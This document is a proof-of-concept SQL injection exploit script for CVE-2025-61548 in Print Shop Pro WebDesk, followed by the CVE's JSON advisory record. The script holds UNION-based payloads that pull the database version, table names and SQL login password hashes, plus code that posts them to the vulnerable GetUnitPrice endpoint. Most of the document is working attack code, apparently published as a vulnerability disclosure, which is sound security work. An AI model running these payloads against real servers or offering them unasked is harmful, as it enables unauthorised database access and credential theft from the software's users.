CVE-2025-61548

# CVE-2025-61548 SQL Injection PoC # Target: Print Shop Pro WebDesk < 19.69 # Endpoint: /PSP/appNET/Store/CartV12.aspx/GetUnitPrice # Vulnerable Parameter: hfInventoryDistFormID import requests import sys target_url = "http://target-server/PSP/appNET/Store/CartV12.aspx/GetUnitPrice" # Basic SQL Injection test - extract database version payload_db_version = "1' UNION SELECT @@version --" # SQL Injection to extract current database name payload_db_name = "1' UNION SELECT DB_NAME() --" # SQL Injection to list all tables payload_list_tables = "1' UNION SELECT name FROM sys.tables --" # SQL Injection to extract user credentials payload_extract_users = "1' UNION SELECT name, password_hash FROM sys.sql_logins --" def test_sql_injection(url, param_name, payload): """Test SQL injection vulnerability""" headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0' } data = { param_name: payload } try: response = requests.post(url, data=data, headers=headers, timeout=10, verify=False) print(f"[*] Payload: {payload}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") if 'sql' in response.text.lower() or 'error' in response.text.lower() or len(response.text) > 100: print("[+] Possible SQL injection detected!") print(f"[+] Response snippet: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": print("CVE-2025-61548 SQL Injection PoC") print("=" * 50) # Test basic injection test_sql_injection(target_url, 'hfInventoryDistFormID', payload_db_version) print("\n" + "=" * 50)

{"cve": {"id": "CVE-2025-61548", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.727", "lastModified": "2026-02-10T18:16:20.083", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection is present on the hfInventoryDistFormID parameter in the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69). Unsanitized user input is incorporated directly into SQL queries without proper parameterization or escaping. This vulnerability allows remote attackers to execute arbitrary SQL commands"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:*", "matchCriteriaId": "88C72179-FF05-44F1-87A2-80179F38245D"}]}]}], "references": [{"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61548", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61548", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}